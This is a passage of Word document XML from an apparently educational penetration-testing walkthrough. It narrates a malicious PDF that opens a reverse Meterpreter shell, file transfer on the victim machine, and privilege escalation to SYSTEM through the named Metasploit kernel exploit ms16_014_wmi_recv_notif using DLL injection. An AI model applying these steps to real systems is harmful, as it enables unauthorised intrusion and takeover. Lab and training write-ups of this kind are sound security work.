          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5D2572" wp14:editId="0972717E">
            <wp:extent cx="4493895" cy="18211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4505752" cy="1825985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C942BF" w14:textId="77777777" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Though the pdf got opeaned but in the background the payload has been executed and by this time we should got a reverse meterpreter shell into our attacker’s machine all the way from the victim’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C2FA4" w14:textId="65BD3AEF" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="278AD5C4" wp14:editId="7CB141B8">
            <wp:extent cx="5494997" cy="265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500208" cy="2658088"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608111D" w14:textId="3E85709C" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FB271C" w14:textId="30EF4E0E" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UPLOADING AND DOWNLOADING FILES IN THE VICTIM’S MACHINE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CE548" w14:textId="306E3A03" w:rsidR="00A63E63" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Let’s try to run some commands like listing the contents,uploading and downloading files etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB44887" w14:textId="124F28CE" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DD1E70" w14:textId="1AE559A0" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAC05AC" w14:textId="41629151" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6DB7C0" w14:textId="752F2D18" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE1E4BC" w14:textId="4E10D33E" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7684CE48" w14:textId="5FEA9B69" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465903B4" w14:textId="5FEFF432" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1377F9E8" w14:textId="7CBB07A7" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2191B9" w14:textId="77777777" w:rsidR="00A62FAA" w:rsidRPr="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6D3EBF" w14:textId="58E02A04" w:rsidR="00A63E63" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE810F0" wp14:editId="6EC56D3C">
            <wp:extent cx="5576633" cy="32924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578687" cy="3293688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46994369" w14:textId="00BBE6C5" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4390BBF4" w14:textId="1091BF91" w:rsidR="00A62FAA" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SEARCHING FOR LOCAL ESCALATION VECTORS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EDF8A" w14:textId="1B06F231" w:rsidR="00F76D68" w:rsidRPr="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>By this time if we check the uid, we will found that it is a normal user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74860994" w14:textId="589AA510" w:rsidR="00F76D68" w:rsidRPr="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBB44CF" wp14:editId="6D1F35EF">
            <wp:extent cx="5726977" cy="161163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2174" cy="1613093"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBFE008" w14:textId="191EBB26" w:rsidR="00A62FAA" w:rsidRPr="00F76D68" w:rsidRDefault="00A62FAA" w:rsidP="00A62FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will background the meterpreter session </w:t>
      </w:r>
      <w:r w:rsidR="00306859">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>we obtained and we will try to find local privilege escalation vectors using the module “</w:t>
      </w:r>
      <w:r w:rsidR="00EA6C13">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00306859">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5DA67" w14:textId="37EEE633" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6301F1D7" w14:textId="5CA7B19A" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28553B63" w14:textId="68D401A8" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285068D1" w14:textId="2FD1EB26" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2336E6C0" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00306859" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AC5F58" w14:textId="0FC3B9A8" w:rsidR="00306859" w:rsidRDefault="00306859" w:rsidP="00306859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA2F45D" wp14:editId="087F1E8D">
            <wp:extent cx="4404360" cy="1965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7509" cy="1966898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B60F80" w14:textId="7D7D9C44" w:rsidR="00306859" w:rsidRDefault="00306859" w:rsidP="00306859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E0E17A" w14:textId="0C36DA11" w:rsidR="00306859" w:rsidRDefault="00306859" w:rsidP="00306859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F58825D" w14:textId="718DE87F" w:rsidR="00306859" w:rsidRDefault="00306859" w:rsidP="00306859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1D519C" w14:textId="7897014E" w:rsidR="00306859" w:rsidRPr="008B0E01" w:rsidRDefault="00306859" w:rsidP="00306859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We found a lot of privilege escalation vectors,but we are interested in “</w:t>
      </w:r>
      <w:r w:rsidRPr="00306859">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit/windows/local/ms16_014_wmi_recv_notif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”.Basically it is a kernel exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A09D4" w14:textId="2C6F0A42" w:rsidR="008B0E01" w:rsidRDefault="008B0E01" w:rsidP="008B0E01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0E01">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically we will be using dll injection method in order to inject the exploit code in a genuine process and when the genuine process executes,the dll also gets executed </w:t>
      </w:r>
      <w:r w:rsidR="002F2DCE">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>and we get a meterpreter session.This meterpreter session has system privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43438A4D" w14:textId="360ED8FB" w:rsidR="00A62FAA" w:rsidRDefault="002F2DCE" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38ACD5AB" wp14:editId="358651AE">
            <wp:extent cx="5563430" cy="2564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568064" cy="2566901"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6D4A5" w14:textId="0538B861" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C060D38" w14:textId="3F360F16" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17ED8EA5" w14:textId="4F9C92DD" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BB0BA4" w14:textId="56BA66DF" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4809601D" w14:textId="2AB90FFA" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A6C2B0" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00A2543E" w:rsidRDefault="00F76D68" w:rsidP="00A2543E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C234BE" w14:textId="3F370691" w:rsidR="00A62FAA" w:rsidRDefault="00A2543E" w:rsidP="00A2543E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61079446" wp14:editId="5B365D0D">
            <wp:extent cx="5349240" cy="2506027"/>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362341" cy="2512165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03BE19" w14:textId="53A086B8" w:rsidR="000900A4" w:rsidRDefault="000900A4" w:rsidP="000900A4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2186C3C0" w14:textId="4A104FB3" w:rsidR="004B6B21" w:rsidRPr="00310D29" w:rsidRDefault="004B6B21" w:rsidP="00310D29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310D29">
        <w:rPr>
